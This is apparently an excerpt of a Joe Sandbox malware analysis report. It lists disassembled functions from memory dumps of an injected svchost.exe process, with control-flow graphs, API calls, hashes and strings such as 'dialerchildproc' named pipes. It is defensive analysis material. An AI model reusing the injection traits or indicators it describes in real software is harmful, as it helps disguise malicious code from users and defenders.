14e41fa7180 265->287 267->255 267->279 275->276 284 14e41fa6b9a-14e41fa6bbc call 14e41fa268c call 14e41fa6a78 275->284 277 14e41fa6bd0-14e41fa6bd3 276->277 278 14e41fa6bd5-14e41fa6bea call 14e41fa6910 276->278 277->278 277->279 278->279 296 14e41fa6bec-14e41fa6bf6 278->296 279->260 284->276 311 14e41fa6bbe-14e41fa6bc6 call 14e41fb5780 284->311 304 14e41fa6a21-14e41fa6a2b call 14e41fa7098 287->304 305 14e41fa6a45-14e41fa6a50 287->305 301 14e41fa6bf8-14e41fa6bff 296->301 302 14e41fa6c01-14e41fa6c11 call 14e41fb5780 296->302 301->279 302->279 304->305 316 14e41fa6a2d-14e41fa6a3b 304->316 305->242 311->276 316->305 317->265 318 14e41fa69e7-14e41fa6a04 call 14e41faabc8 317->318 318->265
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436459719.0000014E41FA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fa0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                    • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                    • API String ID: 190073905-1786718095
                                                                    • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                    • Instruction ID: 3e159b189dba1bc57bfc5d577fc7ac4b56b81dc430d962f8f9d12e70aa5f2c50
                                                                    • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                    • Instruction Fuzzy Hash: 3C81C03170064286FE90AB6694593D9E3D0FF897E0F5C80259A09C7FB6EB3DC8478720
                                                                    Function 0000014E41FDCE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetLastError.KERNEL32 ref: 0000014E41FDCE37
                                                                    • FlsGetValue.KERNEL32(?,?,?,0000014E41FE0A6B,?,?,?,0000014E41FE045C,?,?,?,0000014E41FDC84F), ref: 0000014E41FDCE4C
                                                                    • FlsSetValue.KERNEL32(?,?,?,0000014E41FE0A6B,?,?,?,0000014E41FE045C,?,?,?,0000014E41FDC84F), ref: 0000014E41FDCE6D
                                                                    • FlsSetValue.KERNEL32(?,?,?,0000014E41FE0A6B,?,?,?,0000014E41FE045C,?,?,?,0000014E41FDC84F), ref: 0000014E41FDCE9A
                                                                    • FlsSetValue.KERNEL32(?,?,?,0000014E41FE0A6B,?,?,?,0000014E41FE045C,?,?,?,0000014E41FDC84F), ref: 0000014E41FDCEAB
                                                                    • FlsSetValue.KERNEL32(?,?,?,0000014E41FE0A6B,?,?,?,0000014E41FE045C,?,?,?,0000014E41FDC84F), ref: 0000014E41FDCEBC
                                                                    • SetLastError.KERNEL32 ref: 0000014E41FDCED7
                                                                    • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,0000014E41FE0A6B,?,?,?,0000014E41FE045C,?,?,?,0000014E41FDC84F), ref: 0000014E41FDCF0D
                                                                    • FlsSetValue.KERNEL32(?,?,00000001,0000014E41FDECCC,?,?,?,?,0000014E41FDBF9F,?,?,?,?,?,0000014E41FD7AB0), ref: 0000014E41FDCF2C
                                                                      • Part of subcall function 0000014E41FDD6CC: HeapAlloc.KERNEL32 ref: 0000014E41FDD721
                                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000014E41FE0A6B,?,?,?,0000014E41FE045C,?,?,?,0000014E41FDC84F), ref: 0000014E41FDCF54
                                                                      • Part of subcall function 0000014E41FDD744: HeapFree.KERNEL32 ref: 0000014E41FDD75A
                                                                      • Part of subcall function 0000014E41FDD744: GetLastError.KERNEL32 ref: 0000014E41FDD764
                                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000014E41FE0A6B,?,?,?,0000014E41FE045C,?,?,?,0000014E41FDC84F), ref: 0000014E41FDCF65
                                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000014E41FE0A6B,?,?,?,0000014E41FE045C,?,?,?,0000014E41FDC84F), ref: 0000014E41FDCF76
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: Value$ErrorLast$Heap$AllocFree
                                                                    • String ID:
                                                                    • API String ID: 570795689-0
                                                                    • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                    • Instruction ID: d05d1a81437cdd74f7d820c0fbdd9315d75b8d778be0daec336e8a8adf9e924f
                                                                    • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                    • Instruction Fuzzy Hash: 8141E7B034528441FE69A735955D7F9E3C2BF847B0F1C0B28A92BC66F6EE68D5039230
                                                                    Function 0000014E41FD2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                    • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                    • API String ID: 2171963597-1373409510
                                                                    • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                    • Instruction ID: 7e5f448f2627fb39cf378e58a67f4c7b29978e30c1d81c84a71b5fabbdbaa53a
                                                                    • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                    • Instruction Fuzzy Hash: B0213032718B5482FB10CB25E4483A9A7E0FB85BA4F580215DA5A42BB8CF7CC54ACB10
                                                                    Function 0000014E41FA9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 472 14e41fa9944-14e41fa99ac call 14e41faa814 475 14e41fa99b2-14e41fa99b5 472->475 476 14e41fa9e13-14e41fa9e1b call 14e41fabb48 472->476 475->476 477 14e41fa99bb-14e41fa99c1 475->477 479 14e41fa99c7-14e41fa99cb 477->479 480 14e41fa9a90-14e41fa9aa2 477->480 479->480 484 14e41fa99d1-14e41fa99dc 479->484 482 14e41fa9aa8-14e41fa9aac 480->482 483 14e41fa9d63-14e41fa9d67 480->483 482->483 487 14e41fa9ab2-14e41fa9abd 482->487 485 14e41fa9d69-14e41fa9d70 483->485 486 14e41fa9da0-14e41fa9daa call 14e41fa8a34 483->486 484->480 488 14e41fa99e2-14e41fa99e7 484->488 485->476 489 14e41fa9d76-14e41fa9d9b call 14e41fa9e1c 485->489 486->476 498 14e41fa9dac-14e41fa9dcb call 14e41fa6d40 486->498 487->483 491 14e41fa9ac3-14e41fa9aca 487->491 488->480 492 14e41fa99ed-14e41fa99f7 call 14e41fa8a34 488->492 489->486 495 14e41fa9ad0-14e41fa9b07 call 14e41fa8e10 491->495 496 14e41fa9c94-14e41fa9ca0 491->496 492->498 506 14e41fa99fd-14e41fa9a28 call 14e41fa8a34 * 2 call 14e41fa9124 492->506 495->496 511 14e41fa9b0d-14e41fa9b15 495->511 496->486 499 14e41fa9ca6-14e41fa9caa 496->499 503 14e41fa9cac-14e41fa9cb8 call 14e41fa90e4 499->503 504 14e41fa9cba-14e41fa9cc2 499->504 503->504 520 14e41fa9cdb-14e41fa9ce3 503->520 504->486 510 14e41fa9cc8-14e41fa9cd5 call 14e41fa8cb4 504->510 540 14e41fa9a48-14e41fa9a52 call 14e41fa8a34 506->540 541 14e41fa9a2a-14e41fa9a2e 506->541 510->486 510->520 512 14e41fa9b19-14e41fa9b4b 511->512 517 14e41fa9c87-14e41fa9c8e 512->517 518 14e41fa9b51-14e41fa9b5c 512->518 517->496 517->512 518->517 521 14e41fa9b62-14e41fa9b7b 518->521 522 14e41fa9ce9-14e41fa9ced 520->522 523 14e41fa9df6-14e41fa9e12 call 14e41fa8a34 * 2 call 14e41fabaa8 520->523 525 14e41fa9b81-14e41fa9bc6 call 14e41fa90f8 * 2 521->525 526 14e41fa9c74-14e41fa9c79 521->526 527 14e41fa9d00 522->527 528 14e41fa9cef-14e41fa9cfe call 14e41fa90e4 522->528 523->476 553 14e41fa9bc8-14e41fa9bee call 14e41fa90f8 call 14e41faa038 525->553 554 14e41fa9c04-14e41fa9c0a 525->554 532 14e41fa9c84 526->532 536 14e41fa9d03-14e41fa9d0d call 14e41faa8ac 527->536 528->536 532->517 536->486 551 14e41fa9d13-14e41fa9d61 call 14e41fa8d44 call 14e41fa8f50 536->551 540->480 557 14e41fa9a54-14e41fa9a74 call 14e41fa8a34 * 2 call 14e41faa8ac 540->557 541->540 545 14e41fa9a30-14e41fa9a3b 541->545 545->540 550 14e41fa9a3d-14e41fa9a42 545->550 550->476 550->540 551->486 573 14e41fa9bf0-14e41fa9c02 553->573 574 14e41fa9c15-14e41fa9c72 call 14e41fa9870 553->574 561 14e41fa9c0c-14e41fa9c10 554->561 562 14e41fa9c7b 554->562 578 14e41fa9a76-14e41fa9a80 call 14e41faa99c 557->578 579 14e41fa9a8b 557->579 561->525 563 14e41fa9c80 562->563 563->532 573->553 573->554 574->563 582 14e41fa9a86-14e41fa9def call 14e41fa86ac call 14e41faa3f4 call 14e41fa88a0 578->582 583 14e41fa9df0-14e41fa9df5 call 14e41fabaa8 578->583 579->480 582->583 583->523
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436459719.0000014E41FA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fa0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 849930591-393685449
                                                                    • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                    • Instruction ID: 092061804e2acfd85856a6fbf8df1efce0ac3395992e54896de2f0b233cc8006
                                                                    • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                    • Instruction Fuzzy Hash: F5E16A72704B408AEF609BA5D4883DDB7E0FB557D8F5C4125EA8997FA5CB38C092C760
                                                                    Function 0000014E41FDA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 593 14e41fda544-14e41fda5ac call 14e41fdb414 596 14e41fdaa13-14e41fdaa1b call 14e41fdc748 593->596 597 14e41fda5b2-14e41fda5b5 593->597 597->596 598 14e41fda5bb-14e41fda5c1 597->598 600 14e41fda5c7-14e41fda5cb 598->600 601 14e41fda690-14e41fda6a2 598->601 600->601 605 14e41fda5d1-14e41fda5dc 600->605 603 14e41fda6a8-14e41fda6ac 601->603 604 14e41fda963-14e41fda967 601->604 603->604 606 14e41fda6b2-14e41fda6bd 603->606 608 14e41fda969-14e41fda970 604->608 609 14e41fda9a0-14e41fda9aa call 14e41fd9634 604->609 605->601 607 14e41fda5e2-14e41fda5e7 605->607 606->604 611 14e41fda6c3-14e41fda6ca 606->611 607->601 612 14e41fda5ed-14e41fda5f7 call 14e41fd9634 607->612 608->596 613 14e41fda976-14e41fda99b call 14e41fdaa1c 608->613 609->596 619 14e41fda9ac-14e41fda9cb call 14e41fd7940 609->619 616 14e41fda894-14e41fda8a0 611->616 617 14e41fda6d0-14e41fda707 call 14e41fd9a10 611->617 612->619 627 14e41fda5fd-14e41fda628 call 14e41fd9634 * 2 call 14e41fd9d24 612->627 613->609 616->609 620 14e41fda8a6-14e41fda8aa 616->620 617->616 631 14e41fda70d-14e41fda715 617->631 624 14e41fda8ba-14e41fda8c2 620->624 625 14e41fda8ac-14e41fda8b8 call 14e41fd9ce4 620->625 624->609 630 14e41fda8c8-14e41fda8d5 call 14e41fd98b4 624->630 625->624 638 14e41fda8db-14e41fda8e3 625->638 661 14e41fda62a-14e41fda62e 627->661 662 14e41fda648-14e41fda652 call 14e41fd9634 627->662 630->609 630->638 635 14e41fda719-14e41fda74b 631->635 640 14e41fda887-14e41fda88e 635->640 641 14e41fda751-14e41fda75c 635->641 642 14e41fda9f6-14e41fdaa12 call 14e41fd9634 * 2 call 14e41fdc6a8 638->642 643 14e41fda8e9-14e41fda8ed 638->643 640->616 640->635 641->640 644 14e41fda762-14e41fda77b 641->644 642->596 646 14e41fda8ef-14e41fda8fe call 14e41fd9ce4 643->646 647 14e41fda900 643->647 648 14e41fda874-14e41fda879 644->648 649 14e41fda781-14e41fda7c6 call 14e41fd9cf8 * 2 644->649 657 14e41fda903-14e41fda90d call 14e41fdb4ac 646->657 647->657 653 14e41fda884 648->653 674 14e41fda7c8-14e41fda7ee call 14e41fd9cf8 call 14e41fdac38 649->674 675 14e41fda804-14e41fda80a 649->675 653->640 657->609 672 14e41fda913-14e41fda961 call 14e41fd9944 call 14e41fd9b50 657->672 661->662 666 14e41fda630-14e41fda63b 661->666 662->601 678 14e41fda654-14e41fda674 call 14e41fd9634 * 2 call 14e41fdb4ac 662->678 666->662 671 14e41fda63d-14e41fda642 666->671 671->596 671->662 672->609 693 14e41fda815-14e41fda872 call 14e41fda470 674->693 694 14e41fda7f0-14e41fda802 674->694 682 14e41fda87b 675->682 683 14e41fda80c-14e41fda810 675->683 699 14e41fda68b 678->699 700 14e41fda676-14e41fda680 call 14e41fdb59c 678->700 684 14e41fda880 682->684 683->649 684->653 693->684 694->674 694->675 699->601 703 14e41fda686-14e41fda9ef call 14e41fd92ac call 14e41fdaff4 call 14e41fd94a0 700->703 704 14e41fda9f0-14e41fda9f5 call 14e41fdc6a8 700->704 703->704 704->642
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 849930591-393685449
                                                                    • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                    • Instruction ID: d2352766757894f1e6b2819fe3e7d64d43612c435bf147b291665c758718f4e6
                                                                    • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                    • Instruction Fuzzy Hash: 43E16B72704B408AEF60DF6594493EDB7E0FB85B98F180115EE8E97BA9CB34C492C725
                                                                    Function 0000014E41FDF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeLibraryProc
                                                                    • String ID: api-ms-$ext-ms-
                                                                    • API String ID: 3013587201-537541572
                                                                    • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                    • Instruction ID: eccfb42c00e0fcebc11fba8db2cb5dd556603cf0515602b7340d8b3a720e917a
                                                                    • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                    • Instruction Fuzzy Hash: A0418032315A5091FF16CB56E808BE9A3D6BF46BA0F5D42299D0FD77A4EE38C4478360
                                                                    Function 0000014E41FD104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                    • String ID: d
                                                                    • API String ID: 3743429067-2564639436
                                                                    • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                    • Instruction ID: dcb51b6df01793caf54422eba4bcf925065baaae7f996ed60d537fcaac24bad6
                                                                    • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                    • Instruction Fuzzy Hash: 4A414233218B84C6EB60CF21E44879EB7E5F789B98F448119DA8A47768DF3CC546CB50
                                                                    Function 0000014E41FDD068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FlsGetValue.KERNEL32(?,?,?,0000014E41FDC7DE,?,?,?,?,?,?,?,?,0000014E41FDCF9D,?,?,00000001), ref: 0000014E41FDD087
                                                                    • FlsSetValue.KERNEL32(?,?,?,0000014E41FDC7DE,?,?,?,?,?,?,?,?,0000014E41FDCF9D,?,?,00000001), ref: 0000014E41FDD0A6
                                                                    • FlsSetValue.KERNEL32(?,?,?,0000014E41FDC7DE,?,?,?,?,?,?,?,?,0000014E41FDCF9D,?,?,00000001), ref: 0000014E41FDD0CE
                                                                    • FlsSetValue.KERNEL32(?,?,?,0000014E41FDC7DE,?,?,?,?,?,?,?,?,0000014E41FDCF9D,?,?,00000001), ref: 0000014E41FDD0DF
                                                                    • FlsSetValue.KERNEL32(?,?,?,0000014E41FDC7DE,?,?,?,?,?,?,?,?,0000014E41FDCF9D,?,?,00000001), ref: 0000014E41FDD0F0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: Value
                                                                    • String ID: 1%$Y%
                                                                    • API String ID: 3702945584-1395475152
                                                                    • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                    • Instruction ID: a9bf51a53c9a1f80fc76c82896e2421d109dbda82caf93dda9c71af6b8fc7838
                                                                    • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                    • Instruction Fuzzy Hash: D0111C7070468441FE68A735995D7F9E3C6BF847F0F1C4325A82BC6AFADE68C5039620
                                                                    Function 0000014E41FD7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                    • String ID:
                                                                    • API String ID: 190073905-0
                                                                    • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                    • Instruction ID: a28f0207ded7251b2138ce8eaabf7731b6e17eb6dd1893435d04d01492ed5137
                                                                    • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                    • Instruction Fuzzy Hash: D781F271704B418AFF50AB6598493F9E3D0BF85788F5C46169A0ACB7B6EB78C8078730
                                                                    Function 0000014E41FD9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                                    • String ID: api-ms-
                                                                    • API String ID: 2559590344-2084034818
                                                                    • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                    • Instruction ID: 03ee9c64fc4e5180bd68ea4e23d85fb7920b7978f1ef5f904570876798f634f1
                                                                    • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                    • Instruction Fuzzy Hash: 80317231316A40A1EF169B82A4087E9A3D4BF48BA0F5D46259D1F87BA5DF39C5468330
                                                                    Function 0000014E41FE3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                    • String ID: CONOUT$
                                                                    • API String ID: 3230265001-3130406586
                                                                    • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                    • Instruction ID: 58d35a48e73ae5a6a2069cbe50502fe36390fdbaf60b5645c7a944c23e30e8f6
                                                                    • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                    • Instruction Fuzzy Hash: 86116031318B8486EB608F52E858359B7E0FB88FE4F094225EA5EC77A4DF7CC5168750
                                                                    Function 0000014E41FD3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                    • String ID: wr
                                                                    • API String ID: 1092925422-2678910430
                                                                    • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                    • Instruction ID: 8310219fc58ae82eb0bcc7bfba685b767ad38c6a0f57641c290d7d667e99c083
                                                                    • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                    • Instruction Fuzzy Hash: 80115B76708B4582EF549B21E5082A9B7F1FB88B95F490029DF8E877A4EF3DC506C724
                                                                    Function 0000014E41FD5B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$Current$Context
                                                                    • String ID:
                                                                    • API String ID: 1666949209-0
                                                                    • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                    • Instruction ID: 07ea2566a821138ba5b41bcd2566ad333a6cc9f6e2a32e52345a153ce6aaa6b8
                                                                    • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                    • Instruction Fuzzy Hash: 61D18D76209B8881DE709B16E4943AAB7F0F788B84F144216EACE87B75DF7CC552CB50
                                                                    Function 0000014E41FD2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocFree
                                                                    • String ID: dialer
                                                                    • API String ID: 756756679-3528709123
                                                                    • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                    • Instruction ID: 64828584eb3bfdbaceddc1153c386e701d38d80c8c2db94475a50a70e660af8b
                                                                    • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                    • Instruction Fuzzy Hash: 48317832705B5582FF15CF56A9487AAA7E0BF44B94F0C85249E4A87B65EB38C4A38360
                                                                    Function 0000014E41FD14A4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 70memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$Free
                                                                    • String ID: C:\Windows\system32\svchost.exe
                                                                    • API String ID: 3168794593-4180442734
                                                                    • Opcode ID: 335002606d0c58216c4b7b8c214cf2e956f7ef49abbb5e195d674a66fc258290
                                                                    • Instruction ID: 1ea6c2aa508163f35958e79cb2a9901d7fd2f010a3072b3d942776ec3241fee8
                                                                    • Opcode Fuzzy Hash: 335002606d0c58216c4b7b8c214cf2e956f7ef49abbb5e195d674a66fc258290
                                                                    • Instruction Fuzzy Hash: D021917B60CBD88AEB52DF2598592DDABE1FB49F64F0E4016DB45C3363DA2DC4068720
                                                                    Function 0000014E41FDCFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: Value$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 2506987500-0
                                                                    • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                    • Instruction ID: 4c605ab0eebe7c8a65e16142fd15fb062952cf9a22b794a22443e09c107b39ea
                                                                    • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                    • Instruction Fuzzy Hash: 9511063030528042FE64A735955D7F9A3D2BF847F0F1C4729A92BC6AFAEE69C4039620
                                                                    Function 0000014E41FD199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                    • String ID:
